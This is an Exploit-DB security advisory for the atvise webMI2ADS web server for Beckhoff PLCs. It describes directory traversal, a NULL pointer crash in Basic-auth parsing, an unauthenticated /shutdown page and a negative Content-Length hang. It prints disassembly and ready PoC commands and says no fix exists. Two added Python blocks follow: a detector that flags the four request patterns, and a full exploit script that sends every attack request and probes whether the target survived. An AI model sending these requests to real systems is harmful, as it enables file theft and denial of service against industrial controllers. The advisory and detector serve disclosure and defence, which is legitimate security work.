atvise webMI2ADS Web Server 1.0 – Multiple Vulnerabilities

    Author: Luigi Auriemma
    Date: 2011-10-10
    Category:
    Platform:
    Source: https://www.exploit-db.com/exploits/17963/

    #######################################################################
    
     Luigi Auriemma
    
    Application:  atvise webMI2ADS - Web server for Beckhoff PLCs
                  http://www.atvise.com/en/atvise-downloads/products
    Versions:     <= 1.0
    Platforms:    Windows XP embedded and CE x86/ARM
    Bugs:         A] directory traversal
                  B] NULL pointer
                  C] termination of the software
                  D] resources consumption
    Exploitation: remote
    Date:         10 Oct 2011
    Author:       Luigi Auriemma
    e-mail:       aluigi@autistici.org
    web:          aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From vendor's website:
    "webMI2ADS is a very slim and compact web server with an ADS interface
    (Beckhoff native PLC interface). It can be integrated on nearly any
    ethernet based Beckhoff PLC and provides full data access including
    automatic import of all PLC variables and types."
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    ----------------------
    A] directory traversal
    ----------------------
    
    Classical directory traversal through the backslash delimiter: a
    request path containing ..\ sequences (sent raw or percent-encoded as
    ..%5c) is not normalized, so any file on the disk the server is
    running from can be retrieved.
    
    
    ---------------
    B] NULL pointer
    ---------------
    
    NULL pointer dereference caused by the lack of a check on the value
    returned by strchr while parsing the Authorization: Basic HTTP header.
    The credential buffer (at [EBP-108]) is searched for the ':' separator
    and the result is stored at [EBP-C]; only [EBP-4] is tested for zero,
    so when the token contains no ':' the instruction at 004309E5 writes a
    zero byte through the NULL pointer (the signed compare at 004309DD does
    not catch it, since NULL minus a valid pointer is negative):
    
    0043094F |> 6A 06            PUSH 6                                       ; /maxlen = 6
    00430951 |. 68 7CAB4400      PUSH webMI2AD.0044AB7C                       ; |s2 = "Basic "
    00430956 |. 8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]                 ; |
    00430959 |. 50               PUSH EAX                                     ; |s1
    0043095A |. FF15 10044400    CALL DWORD PTR DS:[<&MSVCR90._strnicmp>]     ; \_strnicmp
    ...skip...
    004309BC |. 6A 3A            PUSH 3A                                      ; /c = 3A (':')
    004309BE |. 8D8D F8FEFFFF    LEA ECX,DWORD PTR SS:[EBP-108]               ; |
    004309C4 |. 51               PUSH ECX                                     ; |s
    004309C5 |. FF15 FC034400    CALL DWORD PTR DS:[<&MSVCR90.strchr>]        ; \strchr
    004309CB |. 83C4 08          ADD ESP,8
    004309CE |. 8945 F4          MOV DWORD PTR SS:[EBP-C],EAX
    004309D1 |. 837D FC 00       CMP DWORD PTR SS:[EBP-4],0
    004309D5 |. 74 4B            JE SHORT webMI2AD.00430A22
    004309D7 |. 8B55 F4          MOV EDX,DWORD PTR SS:[EBP-C]
    004309DA |. 2B55 FC          SUB EDX,DWORD PTR SS:[EBP-4]
    004309DD |. 83FA 40          CMP EDX,40
    004309E0 |. 7D 40            JGE SHORT webMI2AD.00430A22
    004309E2 |. 8B45 F4          MOV EAX,DWORD PTR SS:[EBP-C]
    004309E5 |. C600 00          MOV BYTE PTR DS:[EAX],0
    
    
    ------------------------------
    C] termination of the software
    ------------------------------
    
    The software can be terminated remotely simply by requesting the
    /shutdown page.
    
    
    ------------------------
    D] resources consumption
    ------------------------
    
    A particular negative Content-Length value sends the server into an
    endless loop that keeps consuming memory and pins the CPU at 100%.
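    For the defensive side, here is an added example (written for this page, not part of the original advisory nor of the atvise product) that parses raw HTTP requests and flags each of the four request patterns described above. The sample requests are constructed from the PoC commands further down, not captured traffic; the Basic check mirrors what the server does (look for ':' in the decoded token), the rest is plain string and header matching.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample requests (not captured traffic): one per bug class plus a benign one.
SAMPLES = {
    "traversal_raw":  b"GET /..\\..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0\r\n\r\n",
    "traversal_enc":  b"GET /..%5c..%5c..%5c..%5c..%5c..%5cboot.ini HTTP/1.0\r\n\r\n",
    "basic_no_colon": b"GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n",
    "shutdown":       b"GET /shutdown HTTP/1.0\r\n\r\n",
    "neg_length":     b"POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n",
    "benign":         b"GET /index.html HTTP/1.0\r\nAuthorization: Basic dXNlcjpwYXNz\r\n\r\n",
}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request head into (method, target, lower-cased header dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    target = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def flags_for(raw: bytes) -> set:
    """Return the set of advisory bug classes (A-D) that this request matches."""
    _method, target, headers = parse_request(raw)
    flags = set()

    # A] traversal: percent-decode first, then look for ..\ or ../ anywhere in the path.
    path = unquote(target).split("?", 1)[0]
    if re.search(r"\.\.[\\/]", path):
        flags.add("traversal")

    # B] the server runs strchr(buffer, ':') on the Basic credentials and writes through
    # the result without a NULL check, so a token without ':' after decoding is the trigger.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        token = auth[6:].strip()
        try:
            creds = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            creds = b""  # undecodable token: treat it as "no ':' found"
        if b":" not in creds:
            flags.add("basic_no_colon")

    # C] the shutdown endpoint, whatever the method.
    if path.rstrip("/").lower() == "/shutdown":
        flags.add("shutdown")

    # D] negative (or non-numeric) Content-Length.
    length = headers.get("content-length")
    if length is not None:
        try:
            if int(length) < 0:
                flags.add("negative_content_length")
        except ValueError:
            flags.add("bad_content_length")

    return flags


def triage(samples=SAMPLES) -> dict:
    """Run flags_for over every sample and return {name: sorted flag list}."""
    return {name: sorted(flags_for(raw)) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name:15s} {hits or '-'}")
```

    The traversal check decodes before matching on purpose: a rule that only looks for a literal "..\" misses the %5c form, and one that only looks for "../" misses both on a Windows host.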
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/mytoolz/mydown.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-1.zip
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
    
    A]
    mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
    mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
    
    B]
    udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
    
    C]
    http://SERVER/shutdown
    
    D]
    udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
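    The same four requests without the mydown/udpsz tools, as an added example that is not part of the advisory: each poc_* function returns the raw bytes the commands above send, send_raw() does what `udpsz -T -D` does here (TCP connect, send, collect the reply), and is_alive() is the check to run afterwards for B], C] and D], since those bugs show up as the server dying or hanging rather than in any response. The target address is a placeholder for your own test equipment.

```python
import socket
import sys

# Placeholder target (documentation range); replace with the webMI2ADS host under test.
TARGET = ("192.0.2.10", 80)


def build_request(method: str, target: str, headers=None, body: bytes = b"") -> bytes:
    """Assemble a raw HTTP/1.0 request exactly as udpsz -c would send it (no Host header added)."""
    lines = [f"{method} {target} HTTP/1.0"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


# One request per bug in the advisory.
def poc_traversal(depth: int = 7, filename: str = "boot.ini", encoded: bool = False) -> bytes:
    sep = "%5c" if encoded else "\\"
    return build_request("GET", "/" + (".." + sep) * depth + filename)


def poc_null_pointer(token: str = "blah") -> bytes:
    # The token must decode to something without ':' so the server's strchr returns NULL.
    return build_request("GET", "/", {"Authorization": f"Basic {token}"})


def poc_shutdown() -> bytes:
    return build_request("GET", "/shutdown")


def poc_negative_length(length: int = -30) -> bytes:
    return build_request("POST", "/", {"Content-Length": str(length)})


def send_raw(data: bytes, addr=TARGET, timeout: float = 5.0) -> bytes:
    """Send one request and return whatever the server answers (empty if it hangs or drops)."""
    with socket.create_connection(addr, timeout=timeout) as s:
        s.sendall(data)
        chunks = []
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass  # D] never answers: the server is spinning
        return b"".join(chunks)


def is_alive(addr=TARGET, timeout: float = 3.0) -> bool:
    """TCP connect probe: after B], C] or D] this is what tells you the service is gone."""
    try:
        with socket.create_connection(addr, timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET[0]
    addr = (host, 80)
    # A] returns file contents in the body; print the start of the reply.
    print(send_raw(poc_traversal(), addr)[:200])
    # B] and D] leave no response to inspect; the alive probe is the result.
    for name, req in (("NULL pointer", poc_null_pointer()),
                      ("negative Content-Length", poc_negative_length())):
        try:
            send_raw(req, addr)
        except OSError:
            pass
        print(f"{name}: server alive afterwards = {is_alive(addr)}")
```

    Run the B] and D] probes against a host you own: C] is a clean shutdown, but B] and D] leave the PLC's web interface crashed or spinning until it is restarted.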
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################